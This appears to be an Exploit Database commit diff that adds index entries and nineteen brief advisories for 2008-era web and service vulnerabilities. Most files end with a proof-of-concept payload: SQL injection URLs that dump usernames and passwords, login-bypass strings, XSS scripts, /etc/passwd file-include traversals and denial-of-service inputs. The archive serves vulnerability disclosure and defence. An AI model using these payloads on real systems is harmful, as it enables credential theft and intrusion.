Updated 01_27_2014

files.csv

@@ -28001,3 +28001,22 @@ id,file,description,date,author,platform,type,port
 31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service Directory Traversal",2014-01-24,metasploit,windows,remote,5555
 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
 31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
+31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 'key' Parameter SQL Injection Vulnerability",2008-02-13,"Nico Leidecker",java,webapps,0
+31190,platforms/linux/dos/31190.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2008-02-13,"Ralf Haferkamp",linux,dos,0
+31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities",2008-02-13,S@BUN,asp,webapps,0
+31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0
+31193,platforms/php/webapps/31193.txt,"Joomla! and Mambo 'com_omnirealestate' Component 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0
+31194,platforms/php/webapps/31194.txt,"Dokeos <= 1.8.4 whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31195,platforms/php/webapps/31195.txt,"Dokeos <= 1.8.4 main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31196,platforms/php/webapps/31196.txt,"Dokeos <= 1.8.4 main/calendar/myagenda.php courseCode Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31197,platforms/php/webapps/31197.txt,"Dokeos <= 1.8.4 main/admin/course_category.php category Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31198,platforms/php/webapps/31198.txt,"Dokeos <= 1.8.4 main/admin/session_list.php cmessage Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31199,platforms/php/webapps/31199.txt,"Dokeos <= 1.8.4 main/mySpace/index.php tracking_list_coaches_column Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31200,platforms/php/webapps/31200.txt,"Dokeos <= 1.8.4 main/create_course/add_course.php tutor_name Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
+31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Include Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0
+31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability",2008-02-14,muuratsalo,php,webapps,0
+31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0
+31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
+31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
+31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0

platforms/asp/webapps/31191.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27779/info
+
+Site2Nite Real Estate Web is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following proof-of-concept login and password examples are available:
+
+Login: anything' OR 'x'='x
+Password: anything' OR 'x'='x
+
+

platforms/java/webapps/31189.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/27775/info
+
+Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is tracked by Cisco bug ID CSCsk64286.
+
+This issue affects the following:
+
+Cisco Unified Communication Manager 5.0/5.1 prior to 5.1(3a)
+Cisco Unified Communication Manager 6.0/6.1 prior to 6.1(1a)
+
+https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
+SELECT+'','',firstname,lastname,userid,password+from+enduser;--
+
+https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
+SELECT+'','','',user,'',password+from+applicationuser;-- 

platforms/linux/dos/31190.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27778/info
+
+OpenLDAP is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to deny service to legitimate users.
+
+OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
+
+This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
+
+ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2 

platforms/multiple/dos/31203.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27812/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.
+
+Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.
+
+Firefox 2.0.0.12 is vulnerable; other versions may also be affected. 
+
+<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
+<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
+<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe> 

platforms/php/webapps/31192.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27781/info
+
+The Joomla! and Mambo 'com_model' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* 

platforms/php/webapps/31193.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27783/info
+
+The 'com_omnirealestate' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&resu
+lts=S@BUN 

platforms/php/webapps/31194.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27792/info
+
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+http://www.example.com/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*

platforms/php/webapps/31195.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27792/info
+ 
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+ 
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+GET /dokeos/index.php HTTP/1.0
+Cookie: dk_sid=av68g9lus300ts870iqebhneh5
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: localhost
+Referer: '

platforms/php/webapps/31196.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27792/info
+  
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+  
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+http://www.example.com/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>

platforms/php/webapps/31197.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27792/info
+   
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+   
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+http://www.example.com/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script>

platforms/php/webapps/31198.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27792/info
+    
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+    
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+    
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+http://www.example.com/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27><img/src=javascript:alert('DSecRGXSS')>

platforms/php/webapps/31199.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27792/info
+     
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+     
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+     
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+http://www.example.com/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin&tracking_list_coaches_column=0';

platforms/php/webapps/31200.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/27792/info
+      
+Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
+      
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
+      
+Versions prior to Dokeos 1.8.4 SP2 are affected. 
+
+POST /dokeos/main/create_course/add_course.php HTTP/1.0
+Cookie: dk_sid=av68g9lus300ts870iqebhneh5
+Content-Length: 107
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: localhost
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/dokeos/main/create_course/add_course.php
+title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&tutor_name='

platforms/php/webapps/31201.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27797/info
+
+artmedic webdesign weblog is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application. 
+
+http://www.example.com/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
+http://www.example.com/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00 

platforms/php/webapps/31202.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27802/info
+
+PlutoStatus Locator is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local files in the context of the webserver process. This may allow the attacker to obtain potentially sensitive information; other attacks are also possible.
+
+This issue affects PlutoStatus Locator 1.0pre alpha; other versions may also be affected. 
+
+http://www.example.com/locator/index.php?page=../../../../../../../../../../etc/passwd%00 

platforms/php/webapps/31206.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27818/info
+
+The Joomla! and Mambo 'com_smslist' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_smslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* 

platforms/php/webapps/31207.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27820/info
+
+The Joomla! and Mambo 'com_activities' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,username/**/from/**/mos_users/*
+

platforms/windows/dos/31205.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27817/info
+
+Sami FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions.
+
+An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
+
+Versions in the Sami FTP Server 2.0 series are vulnerable; other versions may also be affected. 
+
+An attacker can use standard FTP clients or network utilities to exploit these issues.
+
+Issuing one of the affected commands followed by 'AA' will trigger a denial of service. 

platforms/windows/remote/31204.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27813/info
+
+Sophos Email Appliance is prone to multiple cross-site scripting vulnerabilities that affect its web interface because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Please note that potential exploits will likely target privileged users.
+
+These issues affect versions prior to Sophos Email Appliance 2.1.1.0. 
+
+https://www.example.com:18080/Login?logout=0&error=<INJECTION>&go=<INJECTION>
+